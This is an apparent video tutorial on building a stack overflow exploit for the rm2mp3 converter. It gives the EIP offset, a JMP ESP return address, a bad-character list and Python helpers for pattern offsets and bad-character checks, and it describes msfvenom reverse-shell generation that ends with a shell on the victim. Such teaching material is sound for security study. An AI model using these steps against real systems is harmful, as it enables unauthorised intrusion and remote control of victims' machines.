Notes of the Demonstration

Today I will give you a demonstration of rm2mp3 converter stack overflow exploit development.

Before starting with this tutorial it is better to understand how functions work in memory. Excellent material is available at: https://www.slideshare.net/saumilshah/how-functions-work-7776073

Once you are finished with it, you need to install Immunity Debugger on the Windows machine. Let's install Immunity Debugger as well as the vulnerable rm2mp3 converter.

So we are good to go now. Let's create a sample file to convert, then load the file and see what happens. The file is not loaded because of its invalid content, but the program keeps running successfully. Now let's increase the size of the input buffer. Again the program runs successfully. Now let's double the buffer.

Note: the technique of feeding ever larger or malformed input to find a crash is called fuzzing.

Now the program crashes. Let's see what happened in Immunity Debugger. Because we wrote "AAAA" into the buffer, it overwrote the value in the EIP register. The stack representation is:

    Array buffer   AAAA AAAA AAAA AAAA
    ----
    OLD EBP
    ----
    EIP
    ----
    Parameters of the function

So when we pass a large array, it overwrites the saved return address (EIP) with AAAA, which is 41414141 in hex.

Now let's identify the offset at which EIP is overwritten. Create a random unique string with metasploit-framework/tools/exploit/pattern_create.rb, copy the EIP value and find the offset using metasploit-framework/tools/exploit/pattern_offset.rb. Let me power up my Kali machine.

So EIP contains 48366C48. Let's search for this value in the generated pattern using pattern_offset.rb. It gives 5808, which is the wrong offset, as we know that up to 15000 characters the program does not crash. So let's verify it using the Python module, or we can simply give the length parameter. It is possible that our program crashed after a buffer length of 26088; let's verify it. The buffer length is accepted. Now let's put four B's at that position to verify that EIP contains 42424242 (42 is the ASCII code of B). As we can see, EIP contains 42424242, which means the application crashes after 26088 characters.

Now let's understand the structure:

    --------
    AAAA AAAA AAAA ....
    ----
    AAAA
    -------
    BBBB
    ----

So when the function returns it pops the saved EIP, and at the time of the crash ESP points to the slot just below the EIP slot. To execute the shellcode we have to find the address of a JMP ESP instruction and put that address in EIP. Whenever that EIP value is popped, the JMP ESP instruction is executed and execution continues from where ESP is pointing. Then we put our shellcode there. Let's do the practical for that.

The address is 75E50F37. \xCC is the INT3 instruction, used to check whether the JMP ESP is working or not. As we can see, my INT3 instruction is executed. Now let's create the shellcode.

To create the shellcode, first we have to identify the bad characters:

    badchar = ("\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10"
               "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
               "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
               "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
               "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
               "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
               "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
               "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
               "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
               "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
               "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
               "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
               "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
               "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
               "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
               "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

The list of bad characters is \x00, \x09, \x0a. At 09 the buffer breaks, so \x09 is a bad character. At 0a the buffer also breaks, so \x0a is a bad character too. With those removed the buffer no longer breaks, so we are good to go to generate the shellcode without bad characters. To do so we can use the Metasploit msfvenom utility. LHOST is the attacker's IP address, in our case Ubuntu's IP, and the port is 4444.

So this is how we got the shell of the victim machine. Thank you so much for watching this video!
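As an added example (not code from the video), here is a small Python reimplementation of what pattern_create.rb and pattern_offset.rb do, run on the values from the notes above. It explains why pattern_offset first reported 5808: the Metasploit pattern repeats every 20280 bytes (26 x 26 x 10 three-byte chunks), and the four bytes that landed in EIP, 48366C48, read little-endian as "Hl6H", which occurs at offset 5808 and again at 26088 once the pattern is long enough. The pattern length of 30000 is an assumed value for this demonstration; the offset of 26088 and the "BBBB" check are the ones from the notes.

```python
import string
import struct

# One full period of the Metasploit pattern: Aa0Aa1Aa2 ... Zz9.
# 26 * 26 * 10 chunks of 3 bytes = 20280 bytes before it repeats.
PERIOD = b"".join(
    (u + l + d).encode("ascii")
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
)


def pattern_create(length: int) -> bytes:
    """Cyclic pattern of the given length, same sequence as pattern_create.rb."""
    reps = length // len(PERIOD) + 1
    return (PERIOD * reps)[:length]


def eip_to_bytes(eip_hex: str) -> bytes:
    """Turn the EIP value shown by the debugger (e.g. '48366C48') back into the
    byte order it had in memory; x86 is little-endian, so 48366C48 -> b'Hl6H'."""
    return struct.pack("<I", int(eip_hex, 16))


def pattern_offset(eip_hex: str, length: int) -> list:
    """Every offset in a pattern of `length` bytes where the EIP bytes occur.
    pattern_offset.rb reports the first hit; with a pattern longer than one
    period the same four bytes show up again 20280 bytes later."""
    needle = eip_to_bytes(eip_hex)
    pat = pattern_create(length)
    hits = []
    i = pat.find(needle)
    while i != -1:
        hits.append(i)
        i = pat.find(needle, i + 1)
    return hits


def verify_offset(offset: int) -> str:
    """Build the verification buffer from the notes ('A' * offset + 'BBBB') and
    return, as the debugger would show it, the dword that sits at `offset`."""
    buf = b"A" * offset + b"BBBB"
    return "%08X" % struct.unpack("<I", buf[offset:offset + 4])[0]


if __name__ == "__main__":
    print(pattern_offset("48366C48", 15000))   # [5808]
    print(pattern_offset("48366C48", 30000))   # [5808, 26088]
    print(verify_offset(26088))                # 42424242
```

With a 15000-byte pattern only 5808 is found, which is the misleading answer the notes describe; with a pattern that spans more than one period the second hit at 26088 appears, matching the crash length that the "BBBB" check later confirmed.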
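The bad-character step above is done by eye in the debugger: send every byte value, look at where the copy in memory stops or diverges, drop that byte from the list, and repeat until the whole sequence survives. As an added example (not from the video), this Python helper automates the comparison. The target is simulated by a constructed function that truncates the copy at the first \x09 or \x0a it meets, mirroring what the notes observed; against a real program the bytes dumped from the debugger would be passed as `in_memory` instead.

```python
def badchar_sequence(exclude=frozenset({0x00})) -> bytes:
    """All byte values 0x00..0xff except those already known to be bad.
    \\x00 is excluded from the start, as in the notes."""
    return bytes(b for b in range(256) if b not in exclude)


def simulate_target_copy(data: bytes) -> bytes:
    """Constructed stand-in for the vulnerable program (not the real rm2mp3
    parser): the copy stops at the first NUL, tab (0x09) or newline (0x0a),
    which reproduces the three bad characters found in the notes."""
    for i, b in enumerate(data):
        if b in (0x00, 0x09, 0x0a):
            return data[:i]
    return data


def first_bad_char(sent: bytes, in_memory: bytes):
    """Compare the bytes that were sent with the bytes that landed in memory.
    Returns the first byte that was truncated or mangled, or None if all of
    them survived the copy."""
    for i, b in enumerate(sent):
        if i >= len(in_memory) or in_memory[i] != b:
            return b
    return None


def find_bad_chars(copy_fn, known=(0x00,)) -> set:
    """Repeat the send / compare cycle, removing each bad byte as it is found,
    until the whole sequence survives. copy_fn models one round trip through
    the target (here simulate_target_copy)."""
    bad = set(known)
    while True:
        sent = badchar_sequence(bad)
        culprit = first_bad_char(sent, copy_fn(sent))
        if culprit is None:
            return bad
        bad.add(culprit)


if __name__ == "__main__":
    found = find_bad_chars(simulate_target_copy)
    print(sorted("\\x%02x" % b for b in found))   # ['\\x00', '\\x09', '\\x0a']
```

Each round finds exactly one new bad character, because the copy is cut off at the first one it hits; that is why the notes had to go around the loop three times (\x00, then \x09, then \x0a) before the full sequence appeared intact in memory.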